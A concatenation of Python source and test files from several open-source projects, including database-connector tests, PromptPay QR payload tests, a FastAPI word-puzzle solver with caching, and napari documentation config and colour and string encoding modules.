def setUpClass(cls):
cls.host_dict = {
'oracle': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
'teradata': {
'database1': {
'name': 'database1',
'host': 'somehost',
}
},
'mssql': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
'mysql': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
'snowflake': {
'database1': {
'name': 'database1',
'host': 'somehost',
'port': 0000
}
},
}
@classmethod
def tearDownClass(cls):
pass
def test_connectors(self):
for name, connector in zip(
[
'oracle',
'mysql',
'mssql',
'teradata',
'snowflake'
],
[
Oracle,
Mysql,
Mssql,
Teradata,
Snowflake
]):
with self.subTest(flavor=name):
# test with host improper host file. should raise MissingFlavor
with self.assertRaises(MissingFlavor):
_ = connector('database1', {'host': 'dummy'})
# test for database that has not been added
with self.assertRaises(MissingDatabase):
_ = connector('database2', self.host_dict)
# test for database added
obj = connector('database1', self.host_dict)
self.assertTrue(hasattr(obj, 'create_engine'))
# this is only useful in an environment where none of the extra packages are available
# with self.assertRaises(MissingPackage):
# obj.create_engine()
if __name__ == '__main__':
unittest.main()
```
#### File: dsdbmanager/test/test_dbobject.py
```python
import json
import unittest
import pathlib
import tempfile
import contextlib
import pandas as pd
import sqlalchemy as sa
import sqlalchemy.exc as exc
from dsdbmanager.dbobject import (
util_function,
insert_into_table,
update_on_table,
table_middleware,
DbMiddleware,
DsDbManager,
TableMeta,
TableInsert,
TableUpdate
)
from dsdbmanager.exceptions_ import (
BadArgumentType,
NoSuchColumn,
NotImplementedFlavor,
EmptyHostFile,
MissingFlavor
)
from dsdbmanager.configuring import ConfigFilesManager
class TestDbObject(unittest.TestCase):
@classmethod
def setUpClass(cls):
metadata = sa.MetaData()
cls.currency_table = sa.Table(
'currency',
metadata,
sa.Column(
'denomination',
sa.String(100),
primary_key=True
),
sa.Column(
'abbreviation',
sa.String(20),
primary_key=True
),
sa.Column(
'countries',
sa.String(500),
primary_key=True
)
)
cls.country_table = sa.Table(
'country',
metadata,
sa.Column(
'country',
sa.String(20),
primary_key=True
),
sa.Column(
'continent',
sa.String(20)
)
)
cls.engine_function = lambda _: sa.create_engine("sqlite:///")
cls.host = {
'oracle': {
'mydatabase': {
'name': 'mydatabase',
'host': 'localhost',
'sid': 'pyt'
},
'newdatabase': {
'name': 'newdatabase',
'host': 'localhost',
'sid': 'pyt',
'schema': 'schemo'
}
}
}
@classmethod
@contextlib.contextmanager
def generate_path(cls, suffix=None) -> pathlib.Path:
try:
temp = tempfile.NamedTemporaryFile(suffix=suffix) if suffix else tempfile.NamedTemporaryFile()
yield pathlib.Path(temp.name)
except OSError as _:
temp = None
finally:
if temp is not None:
temp.close()
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self.engine: sa.engine.Engine = self.engine_function()
self.currency_table.create(self.engine)
self.country_table.create(self.engine)
def tearDown(self):
self.engine.dispose()
def test_util_function(self):
"""
1) check that the tables are in the engine
2) check that the output of the function are sqlalchemy tables
3) check that the wrong table name yields an error
:return:
"""
self.assertIn(self.currency_table.name, self.engine.table_names())
self.assertIn(self.country_table.name, self.engine.table_names())
self.assertIsInstance(
util_function(
table_name=self.country_table.name,
engine=self.engine,
schema=None
),
sa.Table
)
with self.assertRaises(exc.NoSuchTableError):
util_function(
table_name='not_there',
engine=self.engine,
schema=None
)
def test_insert_into_table(self):
"""
:return:
"""
df = pd.DataFrame(
{
'denomination': ['United States Dollar', 'West African Franc CFA'],
'abbreviation': ['USD', 'Franc CFA'],
'countries': ['U.S.A', "Benin, Togo, Burkina Faso, Guinea-Bissau, Cote D'Ivoire, Mali, Niger, Senegal"]
}
)
inserted = insert_into_table(
df=df,
table_name=self.currency_table.name,
engine=self.engine,
schema=None
)
read_df = pd.read_sql(
self.currency_table.name,
self.engine
)
self.assertEqual(inserted, len(df))
self.assertEqual(inserted, len(read_df))
for column in (column.name for column in self.currency_table.columns):
with self.subTest(column=column):
self.assertIn(column, read_df.columns)
def test_update_on_table(self):
"""
:return:
"""
# records to insert
country = [
{
'country': 'U.S.A',
'continent': 'North America'
},
{
'country': 'Benin',
'continent': 'Africa'
},
{
'country': 'Japan',
'continent': 'East Asia'
}
]
# execute insert
insert = self.engine.execute(
self.country_table.insert(),
country
)
insert.close()
# update using tuples as keys
us_update = pd.DataFrame(
{
'country': ['U.S.A'],
'continent': ['America']
}
)
updated = update_on_table(
df=us_update,
keys=('country',),
values=('continent',),
table_name=self.country_table.name,
engine=self.engine,
schema=None
)
us_current_value = self.engine.execute(
sa.select([self.country_table.c['continent']]).where(
self.country_table.c['country'] == 'U.S.A'
)
).fetchall()
self.assertEqual(updated, 1)
self.assertEqual(updated, len(us_current_value))
self.assertEqual(us_current_value[0][0], us_update.loc[0, 'continent'])
# update using dictionary as keys
japan_update = pd.DataFrame(
{
'the country': ['Japan'],
'the continent': ['Asia']
}
)
updated = update_on_table(
df=japan_update,
keys={'country': 'the country'},
values={'continent': 'the continent'},
table_name=self.country_table.name,
engine=self.engine,
schema=None
)
japan_current_value = self.engine.execute(
sa.select([self.country_table.c['continent']]).where(
self.country_table.c['country'] == 'Japan'
)
).fetchall()
self.assertEqual(updated, 1)
self.assertEqual(updated, len(japan_current_value))
self.assertEqual(japan_current_value[0][0], japan_update.loc[0, 'the continent'])
# errors on providing the wrong type of arguments for key etc
with self.assertRaises(BadArgumentType):
update_on_table(
df=japan_update,
keys='country',
values='continent',
table_name=self.country_table.name,
engine=self.engine,
schema=None
)
def test_table_middleware(self):
"""
:return:
"""
read_from_currency_table = table_middleware(
engine=self.engine,
table=self.currency_table.name
)
currencies = [
{
'denomination': 'US Dollar',
'abbreviation': 'USD',
'countries': 'U.S.A'
},
{
'denomination': 'Euro',
'abbreviation': 'EUR',
'countries': 'A bunch'
}
]
insert = self.engine.execute(
self.currency_table.insert(),
currencies
)
insert.close()
self.assertEqual(read_from_currency_table().shape, (len(currencies), 3))
self.assertEqual(read_from_currency_table(rows=1).shape, (1, 3))
self.assertEqual(read_from_currency_table(rows=1, columns=('abbreviation', 'countries')).shape, (1, 2))
self.assertEqual(read_from_currency_table(abbreviation='USD').shape, (1, 3))
self.assertTrue(read_from_currency_table(abbreviation='FCFA').empty)
with self.assertWarnsRegex(UserWarning, r"Columns \[made_up, not there\] are not in table currency"):
read_with_warning = read_from_currency_table(columns=('abbreviation', 'countries', 'not there', 'made_up'))
self.assertEqual(read_with_warning.shape, (len(currencies), 2))
# query bad columns
with self.assertRaises(NoSuchColumn):
_ = read_from_currency_table(columns=('madeup', 'made up'))
def test_dbmiddleware(self):
"""
:return:
"""
with DbMiddleware(self.engine, connect_only=False, schema=None) as dbm:
for attr in (
self.currency_table.name,
self.country_table.name,
'sqlalchemy_engine',
'_metadata',
'_insert',
'_update'
):
with self.subTest(attribute=attr):
self.assertTrue(hasattr(dbm, attr))
self.assertIsInstance(dbm._metadata, TableMeta)
self.assertIsInstance(dbm._insert, TableInsert)
self.assertIsInstance(dbm._update, TableUpdate)
def test_dsdbmanager(self):
with self.assertRaises(NotImplementedFlavor):
_ = DsDbManager('somemadeupflavor')
with self.generate_path(suffix='.json') as hp, self.generate_path(
suffix='.json') as cp, self.generate_path() as kp:
c = ConfigFilesManager(
hp,
cp,
kp
)
# test empty host file
with hp.open('w') as f:
json.dump({}, f)
with self.assertRaises(EmptyHostFile):
_ = DsDbManager('oracle', c)
# test with actual host data
with hp.open('w') as f:
json.dump(self.host, f)
dbobject = DsDbManager('oracle', c)
# test for missing flavor
with self.assertRaises(MissingFlavor):
_ = DsDbManager('teradata', c)
# some properties must be there by default
for attribute in [
'_flavor',
'_config_file_manager',
'_host_dict',
'_available_databases',
'_schemas_per_databases',
'_connection_object_creator',
]:
with self.subTest(attribute=attribute):
self.assertTrue(hasattr(dbobject, attribute))
# properties based on host file
for host_database in self.host.get('oracle'):
with self.subTest(host_database=host_database):
self.assertTrue(hasattr(dbobject, host_database))
# the host_dict should be the same dictionary as host
self.assertEqual(self.host, dbobject._host_dict)
# two available databases and two schemas
self.assertEqual(len(dbobject._available_databases), 2)
self.assertEqual(len(dbobject._schemas_per_databases), 2)
self.assertEqual(dbobject._available_databases, ['mydatabase', 'newdatabase'])
self.assertEqual(dbobject._schemas_per_databases, [None, 'schemo'])
# TODO - test TableMeta, TableInsert, TableUpdate: check for keyerror etc
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jojoduquartier/Python",
"score": 4
} |
#### File: Python/maths/find_lcm.py
```python
def find_lcm(num_1, num_2):
"""
Returns the least common multiple of two integers.
:param x: any integer
:param y: any integer
:return: integer z such that remainder(z/x) == 0 and remainder(z/y) == 0
"""
max = num_1 if num_1 > num_2 else num_2
lcm = max
while (True):
if ((lcm % num_1 == 0) and (lcm % num_2 == 0)):
break
lcm += max
return lcm
def lcm(x: int, y: int):
"""
Returns the least common multiple of two integers.
:param x: any integer
:param y: any integer
:return: integer z such that remainder(z/x) == 0 and remainder(z/y) == 0
Not necessarily faster solution, just a different solution using filter
"""
# if either number is 0 then lcm should be 0
if x == 0 or y == 0:
return 0
# simple algorithm is to return the first multiple of x that is also a multiple of y
# the built in filter function is great for such tasks
# note that we use multiples of the large number as it makes the generator length smaller
min_ = min(x, y)
max_ = max(x, y)
return next(filter(lambda i: i % min_ == 0, (max_ * j for j in range(1, min_ + 1))))
def main():
num_1 = 12
num_2 = 76
print(find_lcm(num_1, num_2))
print(lcm(num_1, num_2))
if __name__ == '__main__':
main()
``` |
{
"source": "jojoee/promptpay",
"score": 2
} |
#### File: promptpay/tests/test_qrcode.py
```python
from promptpay import qrcode
import os.path
class TestSanitizeTarget:
def test_normal(self):
# phone
assert qrcode.sanitize_target(target="0801234567") == "0801234567"
# national id
assert qrcode.sanitize_target(target="1111111111111") == "1111111111111"
# tax id
assert qrcode.sanitize_target(target="0123456789012") == "0123456789012"
# ewallet
assert qrcode.sanitize_target(target="012345678901234") == "012345678901234"
def test_with_dash(self):
# phone
assert qrcode.sanitize_target(target="080-123-4567") == "0801234567"
# national id
assert qrcode.sanitize_target(target="1-1111-11111-11-1") == "1111111111111"
def test_with_international_format(self):
assert qrcode.sanitize_target(target="+66-89-123-4567") == "66891234567"
class TestFormatTarget:
def test_normal(self):
# phone
assert qrcode.format_target("0899999999") == "0066899999999"
# national id
assert qrcode.format_target("1234567890123") == "1234567890123"
def test_with_dash(self):
assert qrcode.format_target("089-999-9999") == "0066899999999"
def test_with_zero_leading(self):
# tax id which is start with 0
assert qrcode.format_target("0123456789012") == "0123456789012"
class TestFormatAmount:
def test_normal(self):
assert qrcode.format_amount(10.23) == "10.23"
def test_number_without_decimal(self):
assert qrcode.format_amount(10) == "10.00"
def test_number_with_more_than_two_decimal_number(self):
assert qrcode.format_amount(1337.1337) == "1337.13"
assert qrcode.format_amount(1337.1387) == "1337.14"
class TestChecksum:
def test_normal(self):
assert qrcode.checksum("00020101021129370016A000000677010111011300660000000005802TH53037646304") == "8956"
assert qrcode.checksum("00020101021129370016A000000677010111011300668999999995802TH53037646304") == "FE29"
class TestFormat:
def test_normal(self):
assert qrcode.format("00", "01") == "000201"
assert qrcode.format("05", "420") == "0503420"
class TestGeneratePayload:
def test_local_phone_number(self):
assert qrcode.generate_payload(
id="0801234567") == "00020101021129370016A000000677010111011300668012345675802TH530376463046197"
assert qrcode.generate_payload(
id="0899999999") == "00020101021129370016A000000677010111011300668999999995802TH53037646304FE29"
assert qrcode.generate_payload(
id="0891234567") == "00020101021129370016A000000677010111011300668912345675802TH5303764630429C1"
assert qrcode.generate_payload(
id="0000000000") == "00020101021129370016A000000677010111011300660000000005802TH530376463048956"
def test_local_phone_number_with_dash(self):
assert qrcode.generate_payload(
id="080-123-4567") == "00020101021129370016A000000677010111011300668012345675802TH530376463046197"
def test_local_phone_number_with_international_format(self):
assert qrcode.generate_payload(
id="+66-89-123-4567") == "00020101021129370016A000000677010111011300668912345675802TH5303764630429C1"
def test_national_id_number(self):
assert qrcode.generate_payload(
id="1111111111111") == "00020101021129370016A000000677010111021311111111111115802TH530376463047B5A"
assert qrcode.generate_payload(
id="1234567890123") == "00020101021129370016A000000677010111021312345678901235802TH53037646304EC40"
def test_national_id_number_with_dash(self):
assert qrcode.generate_payload(
id="1-1111-11111-11-1") == "00020101021129370016A000000677010111021311111111111115802TH530376463047B5A"
def test_tax_id(self):
assert qrcode.generate_payload(
id="0123456789012") == "00020101021129370016A000000677010111021301234567890125802TH530376463040CBD"
def test_ewallet_id(self):
# eWallet ID, KPlus ID
assert qrcode.generate_payload(
id="012345678901234") == "00020101021129390016A00000067701011103150123456789012345802TH530376463049781"
assert qrcode.generate_payload(
id="004999000288505") == "00020101021129390016A00000067701011103150049990002885055802TH530376463041521"
# KPlus shop ID
assert qrcode.generate_payload(
id="004000006579718") == "00020101021129390016A00000067701011103150040000065797185802TH53037646304FBB5"
def test_amount_setting(self):
# phone number
assert qrcode.generate_payload(
id="000-000-0000",
amount=4.22) == "00020101021229370016A000000677010111011300660000000005802TH530376454044.226304E469"
assert qrcode.generate_payload(
id="089-123-4567",
amount=13371337.75) == "00020101021229370016A000000677010111011300668912345675802TH5303764541113371337.756304B7D7"
# national id
assert qrcode.generate_payload(
id="1234567890123",
amount=420) == "00020101021229370016A000000677010111021312345678901235802TH53037645406420.006304BF7B"
# eWallet ID, KPlus ID
assert qrcode.generate_payload(
id="004999000288505",
amount=100.25) == "00020101021229390016A00000067701011103150049990002885055802TH53037645406100.256304369A"
# KPlus shop ID
assert qrcode.generate_payload(
id="004000006579718",
amount=200.50) == "00020101021229390016A00000067701011103150040000065797185802TH53037645406200.5063048A37"
class TestToImage:
def test_normal(self):
payload = qrcode.generate_payload("0841234567")
img = qrcode.to_image(payload)
assert type(img).__name__ == "PilImage"
class TestToFile:
def test_normal(self):
payload = qrcode.generate_payload("0841234567")
filepath = "./exported-qrcode-file.png"
qrcode.to_file(payload, filepath)
assert os.path.exists(filepath)
``` |
{
"source": "jojoee/strblackout",
"score": 3
} |
#### File: strblackout/tests/test_strblackout.py
```python
import unittest
from strblackout import blackout
class TestBlackout(unittest.TestCase):
def test_blackout_default(self):
self.assertEqual(blackout("123456789"), "123456789")
def test_blackout_left(self):
self.assertEqual(blackout("123456789", left=5), "*****6789")
def test_blackout_right(self):
self.assertEqual(blackout("123456789", right=3), "123456***")
def test_blackout_replacement(self):
self.assertEqual(blackout("123456789", left=3, replacement="x"), "xxx456789")
def test_blackout_short_text(self):
self.assertEqual(blackout("123", left=10, right=20), "***")
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jojoee/wordcookies",
"score": 2
} |
#### File: wordcookies/web/main.py
```python
import json
from fastapi import FastAPI
from fastapi.staticfiles import StaticFiles
from starlette.responses import FileResponse # Use this to serve a public/index.html
from simplekv.memory.redisstore import RedisStore
from simplekv.fs import FilesystemStore
import redis
from config import REDIS_HOST, REDIS_PORT, REDIS_DB, REDIS_PASS, IS_DEBUG, PORT
import uvicorn
from wordcookies import game
# init FastAPI
app = FastAPI()
app.mount("/public", StaticFiles(directory="./public"), name="public")
# init cache
# TODO: move to constant
text_domain = "wordcookies"
if REDIS_HOST == "":
cache_path = "./cache"
print("cache storage: file, inside %s" % cache_path)
store = FilesystemStore(cache_path)
else:
print("cache storage: Redis, host %s" % REDIS_HOST)
store = RedisStore(redis.StrictRedis(REDIS_HOST, REDIS_PORT, REDIS_DB, REDIS_PASS))
@app.get("/")
def read_index():
return FileResponse("./public/index.html")
@app.get("/healthcheck")
def read_healthcheck():
return {"message": "ok"}
@app.get("/404")
def read_404():
return {"Not": "Found"}
@app.get("/api/solve/{s}")
def read_input(s: str):
global text_domain
chars = game.clean(s)
key_name = "%s_%s" % (text_domain, "".join(chars))
g = None
try:
cached_data = store.get(key_name)
print("key_name: %s, found cached_data" % key_name)
g = json.loads(cached_data.decode("utf8").replace("'", '"'))
except Exception as e:
print("key_name: %s, not found cached_data" % str(e))
answers = game.get_possible_answers(chars)
g = game.group(answers)
# save cache
store.put(key_name, json.dumps(g).encode("utf-8"))
return {"code": 200, "message": "", "data": g}
if __name__ == "__main__":
uvicorn.run("main:app", host="0.0.0.0", port=PORT, debug=IS_DEBUG, reload=IS_DEBUG)
``` |
{
"source": "jojoelfe/napari",
"score": 2
} |
#### File: napari/docs/conf.py
```python
from importlib import import_module
from pathlib import Path
import qtgallery
from jinja2.filters import FILTERS
import napari
release = napari.__version__
if "dev" in release:
version = "dev"
else:
version = release
# -- Project information -----------------------------------------------------
project = 'napari'
copyright = '2022, The napari team'
author = 'The napari team'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
autosummary_generate = True
autosummary_imported_members = True
comments_config = {'hypothesis': False, 'utterances': False}
# execution_allow_errors = False
# execution_excludepatterns = []
# execution_in_temp = False
# execution_timeout = 30
extensions = [
"sphinx.ext.napoleon",
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx_external_toc",
"sphinx_tabs.tabs",
'myst_nb',
# "sphinx_comments",
"sphinx_panels",
"sphinx.ext.viewcode",
"sphinx_gallery.gen_gallery",
]
external_toc_path = "_toc.yml"
external_toc_exclude_missing = False
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'napari'
html_theme_options = {
"external_links": [
{"name": "napari hub", "url": "https://napari-hub.org"}
],
"github_url": "https://github.com/napari/napari",
"navbar_start": ["navbar-project"],
"navbar_end": ["navbar-icon-links"],
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_logo = "images/logo.png"
html_sourcelink_suffix = ''
html_title = 'napari'
html_css_files = [
'custom.css',
]
intersphinx_mapping = {
'python': ['https://docs.python.org/3', None],
'numpy': ['https://numpy.org/doc/stable/', None],
'napari_plugin_engine': [
'https://napari-plugin-engine.readthedocs.io/en/latest/',
'https://napari-plugin-engine.readthedocs.io/en/latest/objects.inv',
],
'magicgui': [
'https://napari.org/magicgui/',
'https://napari.org/magicgui/objects.inv',
],
}
jupyter_cache = ''
jupyter_execute_notebooks = 'auto'
myst_enable_extensions = [
'colon_fence',
'dollarmath',
'substitution',
'tasklist',
]
nb_output_stderr = 'show'
panels_add_bootstrap_css = False
pygments_style = 'solarized-dark'
suppress_warnings = ['myst.header', 'etoc.toctree']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
'_build',
'Thumbs.db',
'.DS_Store',
'.jupyter_cache',
'jupyter_execute',
]
napoleon_custom_sections = [('Events', 'params_style')]
def reset_napari_theme(gallery_conf, fname):
from napari.settings import get_settings
settings = get_settings()
settings.appearance.theme = 'dark'
qtgallery.reset_qapp(gallery_conf, fname)
sphinx_gallery_conf = {
'examples_dirs': '../examples', # path to your example scripts
'gallery_dirs': 'gallery', # path to where to save gallery generated output
'filename_pattern': '/*.py',
'ignore_pattern': 'README.rst|/*_.py',
'default_thumb_file': Path(__file__).parent.parent
/ 'napari'
/ 'resources'
/ 'logo.png',
'plot_gallery': True,
'download_all_examples': False,
'min_reported_time': 10,
'only_warn_on_example_error': True,
'image_scrapers': (qtgallery.qtscraper,),
'reset_modules': (reset_napari_theme,),
}
def setup(app):
"""Ignore .ipynb files.
Prevents sphinx from complaining about multiple files found for document
when generating the gallery.
"""
app.registry.source_suffix.pop(".ipynb", None)
def get_attributes(item, obj, modulename):
"""Filters attributes to be used in autosummary.
Fixes import errors when documenting inherited attributes with autosummary.
"""
module = import_module(modulename)
if hasattr(getattr(module, obj), item):
return f"~{obj}.{item}"
else:
return ""
FILTERS["get_attributes"] = get_attributes
```
#### File: napari/examples/tracks_3d_with_graph.py
```python
import napari
import numpy as np
def _circle(r, theta):
x = r * np.cos(theta)
y = r * np.sin(theta)
return x, y
def tracks_3d_merge_split():
"""Create tracks with splitting and merging."""
timestamps = np.arange(300)
def _trajectory(t, r, track_id):
theta = t * 0.1
x, y = _circle(r, theta)
z = np.zeros(x.shape)
tid = np.ones(x.shape) * track_id
return np.stack([tid, t, z, y, x], axis=1)
trackA = _trajectory(timestamps[:100], 30.0, 0)
trackB = _trajectory(timestamps[100:200], 10.0, 1)
trackC = _trajectory(timestamps[100:200], 50.0, 2)
trackD = _trajectory(timestamps[200:], 30.0, 3)
data = [trackA, trackB, trackC, trackD]
tracks = np.concatenate(data, axis=0)
tracks[:, 2:] += 50.0 # centre the track at (50, 50, 50)
graph = {1: 0, 2: [0], 3: [1, 2]}
features = {'time': tracks[:, 1]}
return tracks, features, graph
tracks, features, graph = tracks_3d_merge_split()
vertices = tracks[:, 1:]
viewer = napari.Viewer(ndisplay=3)
viewer.add_points(vertices, size=1, name='points', opacity=0.3)
viewer.add_tracks(tracks, features=features, graph=graph, name='tracks')
if __name__ == '__main__':
napari.run()
```
#### File: layers/utils/_color_encoding.py
```python
from typing import Any, Literal, Optional, Tuple, Union
import numpy as np
from pydantic import Field, parse_obj_as, validator
from typing_extensions import Protocol, runtime_checkable
from ...utils import Colormap
from ...utils.colormaps import ValidColormapArg, ensure_colormap
from ...utils.colormaps.categorical_colormap import CategoricalColormap
from ...utils.colormaps.standardize_color import transform_color
from ...utils.translations import trans
from .color_transformations import ColorType
from .style_encoding import (
StyleEncoding,
_ConstantStyleEncoding,
_DerivedStyleEncoding,
_ManualStyleEncoding,
)
class ColorValue(np.ndarray):
"""A 4x1 array that represents one RGBA color value."""
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
return transform_color(val)[0]
class ColorArray(np.ndarray):
"""An Nx4 array where each row of N represents one RGBA color value."""
@classmethod
def __get_validators__(cls):
yield cls.validate_type
@classmethod
def validate_type(cls, val):
return (
np.empty((0, 4), np.float32)
if len(val) == 0
else transform_color(val)
)
@runtime_checkable
class ColorEncoding(StyleEncoding[ColorValue, ColorArray], Protocol):
"""Encodes colors from features."""
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(
cls, value: Union['ColorEncoding', dict, str, ColorType]
) -> 'ColorEncoding':
"""Validates and coerces a value to a ColorEncoding.
Parameters
----------
value : ColorEncodingArgument
The value to validate and coerce.
If this is already a ColorEncoding, it is returned as is.
If this is a dict, then it should represent one of the built-in color encodings.
If this a string, then a DirectColorEncoding is returned.
If this a single color, a ConstantColorEncoding is returned.
If this is a sequence of colors, a ManualColorEncoding is returned.
Returns
-------
ColorEncoding
Raises
------
TypeError
If the value is not a supported type.
ValidationError
If the value cannot be parsed into a ColorEncoding.
"""
if isinstance(value, ColorEncoding):
return value
if isinstance(value, dict):
return parse_obj_as(
Union[
ConstantColorEncoding,
ManualColorEncoding,
DirectColorEncoding,
NominalColorEncoding,
QuantitativeColorEncoding,
],
value,
)
if isinstance(value, str):
return DirectColorEncoding(feature=value, fallback=DEFAULT_COLOR)
try:
color_array = ColorArray.validate_type(value)
except (ValueError, AttributeError, KeyError):
raise TypeError(
trans._(
'value should be a ColorEncoding, a dict, a string, a color, a sequence of colors, or None',
deferred=True,
)
)
if color_array.shape[0] == 1:
return ConstantColorEncoding(constant=value)
return ManualColorEncoding(array=color_array, default=DEFAULT_COLOR)
"""The default color to use, which may also be used a safe fallback color."""
DEFAULT_COLOR = ColorValue.validate_type('cyan')
class ConstantColorEncoding(_ConstantStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values from a single constant color.
Attributes
----------
constant : ColorValue
The constant color RGBA value.
"""
encoding_type: Literal['ConstantColorEncoding'] = 'ConstantColorEncoding'
constant: ColorValue
class ManualColorEncoding(_ManualStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values manually in an array attribute.
Attributes
----------
array : ColorArray
The array of color values. Can be written to directly to make
persistent updates.
default : ColorValue
The default color value.
"""
encoding_type: Literal['ManualColorEncoding'] = 'ManualColorEncoding'
array: ColorArray
default: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
class DirectColorEncoding(_DerivedStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values directly from a feature column.
Attributes
----------
feature : str
The name of the feature that contains the desired color values.
fallback : ColorArray
The safe constant fallback color to use if the feature column
does not contain valid color values.
"""
encoding_type: Literal['DirectColorEncoding'] = 'DirectColorEncoding'
feature: str
fallback: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
def __call__(self, features: Any) -> ColorArray:
# A column-like may be a series or have an object dtype (e.g. color names),
# neither of which transform_color handles, so convert to a list.
return ColorArray.validate_type(list(features[self.feature]))
class NominalColorEncoding(_DerivedStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values from a nominal feature whose values are mapped to colors.
Attributes
----------
feature : str
The name of the feature that contains the nominal values to be mapped to colors.
colormap : CategoricalColormap
Maps the feature values to colors.
fallback : ColorValue
The safe constant fallback color to use if mapping the feature values to
colors fails.
"""
encoding_type: Literal['NominalColorEncoding'] = 'NominalColorEncoding'
feature: str
colormap: CategoricalColormap
fallback: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
def __call__(self, features: Any) -> ColorArray:
# map is not expecting some column-likes (e.g. pandas.Series), so ensure
# this is a numpy array first.
values = np.asarray(features[self.feature])
return self.colormap.map(values)
class QuantitativeColorEncoding(_DerivedStyleEncoding[ColorValue, ColorArray]):
"""Encodes color values from a quantitative feature whose values are mapped to colors.
Attributes
----------
feature : str
The name of the feature that contains the nominal values to be mapped to colors.
colormap : Colormap
Maps feature values to colors.
contrast_limits : Optional[Tuple[float, float]]
The (min, max) feature values that should respectively map to the first and last
colors in the colormap. If None, then this will attempt to calculate these values
from the feature values each time this generates color values. If that attempt
fails, these are effectively (0, 1).
fallback : ColorValue
The safe constant fallback color to use if mapping the feature values to
colors fails.
"""
encoding_type: Literal[
'QuantitativeColorEncoding'
] = 'QuantitativeColorEncoding'
feature: str
colormap: Colormap
contrast_limits: Optional[Tuple[float, float]] = None
fallback: ColorValue = Field(default_factory=lambda: DEFAULT_COLOR)
def __call__(self, features: Any) -> ColorArray:
values = features[self.feature]
contrast_limits = self.contrast_limits or _calculate_contrast_limits(
values
)
if contrast_limits is not None:
values = np.interp(values, contrast_limits, (0, 1))
return self.colormap.map(values)
@validator('colormap', pre=True, always=True)
def _check_colormap(cls, colormap: ValidColormapArg) -> Colormap:
return ensure_colormap(colormap)
@validator('contrast_limits', pre=True, always=True)
def _check_contrast_limits(
cls, contrast_limits
) -> Optional[Tuple[float, float]]:
if (contrast_limits is not None) and (
contrast_limits[0] >= contrast_limits[1]
):
raise ValueError(
'contrast_limits must be a strictly increasing pair of values'
)
return contrast_limits
def _calculate_contrast_limits(
values: np.ndarray,
) -> Optional[Tuple[float, float]]:
contrast_limits = None
if values.size > 0:
min_value = np.min(values)
max_value = np.max(values)
# Use < instead of != to handle nans.
if min_value < max_value:
contrast_limits = (min_value, max_value)
return contrast_limits
```
#### File: layers/utils/string_encoding.py
```python
from string import Formatter
from typing import Any, Dict, Sequence, Union
import numpy as np
from pydantic import parse_obj_as
from typing_extensions import Literal, Protocol, runtime_checkable
from ...utils.events.custom_types import Array
from ...utils.translations import trans
from .style_encoding import (
StyleEncoding,
_ConstantStyleEncoding,
_DerivedStyleEncoding,
_ManualStyleEncoding,
)
"""A scalar array that represents one string value."""
StringValue = Array[str, ()]
"""An Nx1 array where each element represents one string value."""
StringArray = Array[str, (-1,)]
"""The default string value, which may also be used a safe fallback string."""
DEFAULT_STRING = np.array('', dtype='<U1')
@runtime_checkable
class StringEncoding(StyleEncoding[StringValue, StringArray], Protocol):
"""Encodes strings from layer features."""
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(
cls, value: Union['StringEncoding', dict, str, Sequence[str]]
) -> 'StringEncoding':
"""Validates and coerces a value to a StringEncoding.
Parameters
----------
value : StringEncodingArgument
The value to validate and coerce.
If this is already a StringEncoding, it is returned as is.
If this is a dict, then it should represent one of the built-in string encodings.
If this a valid format string, then a FormatStringEncoding is returned.
If this is any other string, a DirectStringEncoding is returned.
If this is a sequence of strings, a ManualStringEncoding is returned.
Returns
-------
StringEncoding
Raises
------
TypeError
If the value is not a supported type.
ValidationError
If the value cannot be parsed into a StringEncoding.
"""
if isinstance(value, StringEncoding):
return value
if isinstance(value, dict):
return parse_obj_as(
Union[
ConstantStringEncoding,
ManualStringEncoding,
DirectStringEncoding,
FormatStringEncoding,
],
value,
)
if isinstance(value, str):
if _is_format_string(value):
return FormatStringEncoding(format=value)
return DirectStringEncoding(feature=value)
if isinstance(value, Sequence):
return ManualStringEncoding(array=value, default=DEFAULT_STRING)
raise TypeError(
trans._(
'value should be a StringEncoding, a dict, a string, a sequence of strings, or None',
deferred=True,
)
)
class ConstantStringEncoding(_ConstantStyleEncoding[StringValue, StringArray]):
"""Encodes color values from a single constant color.
Attributes
----------
constant : StringValue
The constant string value.
encoding_type : Literal['ConstantStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
constant: StringValue
encoding_type: Literal['ConstantStringEncoding'] = 'ConstantStringEncoding'
class ManualStringEncoding(_ManualStyleEncoding[StringValue, StringArray]):
"""Encodes string values manually in an array.
Attributes
----------
array : StringArray
The array of string values.
default : StringValue
The default string value that is used when requesting a value that
is out of bounds in the array attribute.
encoding_type : Literal['ManualStringEncoding']
The type of encoding this specifies, which is useful for distinguishing
this from other encodings when passing this as a dictionary.
"""
array: StringArray
default: StringValue = DEFAULT_STRING
encoding_type: Literal['ManualStringEncoding'] = 'ManualStringEncoding'
